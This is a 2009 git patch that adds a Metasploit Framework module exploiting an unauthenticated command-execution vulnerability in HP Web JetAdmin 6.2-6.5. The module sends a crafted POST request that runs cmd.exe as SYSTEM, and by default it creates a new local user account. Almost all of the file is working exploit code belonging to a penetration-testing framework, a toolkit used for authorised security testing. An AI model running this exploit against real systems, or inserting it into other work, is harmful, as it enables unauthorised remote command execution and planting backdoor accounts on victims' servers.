From 5f650c0751ae57152405135ab7e4680e227d2ead Mon Sep 17 00:00:00 2001
From: Patrick Webster <patrick@aushack.com>
Date: Sat, 19 Sep 2009 00:33:44 +0000
Subject: [PATCH] Added HP Web JetAdmin aux command exec module.

git-svn-id: file:///home/svn/framework3/trunk@7041 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../admin/http/hp_web_jetadmin_exec.rb        | 61 +++++++++++++++++++
 1 file changed, 61 insertions(+)
 create mode 100644 modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb

diff --git a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb
new file mode 100644
index 0000000000..9680c3ccf9
--- /dev/null
+++ b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb
@@ -0,0 +1,61 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'HP Web JetAdmin 6.5 Server Arbitrary Command Execution',
+			'Description'    => %q{
+				This module abuses a command execution vulnerability within the
+				web based management console of the Hewlett-Packard Web JetAdmin
+				network printer tool v6.2 - v6.5. It is possible to execute commands
+				as SYSTEM without authentication. The vulnerability also affects POSIX
+				systems, however at this stage the module only works against Windows.
+				This module does not apply to HP printers.
+			},
+			'Author'         => [ 'patrick' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'OSVDB', '5798' ],
+					[ 'BID', '10224' ],
+					#[ 'CVE', '' ],# No CVE!
+					[ 'URL', 'http://www.milw0rm.com/exploits/294' ],
+				],
+			'DisclosureDate' => 'Apr 27 2004'))
+			
+			register_options(
+				[
+					Opt::RPORT(8000),
+					OptString.new('CMD', [ false, "The command to execute.", "net user metasploit password /add" ]),
+				], self.class)
+	end
+
+	def run
+		cmd = datastore['CMD'].gsub(' ', ',')
+
+		send_request_cgi({
+				'uri'     => '/plugins/framework/script/content.hts',
+				'method'  => 'POST',
+				'data'    => 'obj=Httpd:ExecuteFile(,cmd.exe,/c,' + cmd + ',)'
+			}, 3)
+	end
+
+end
+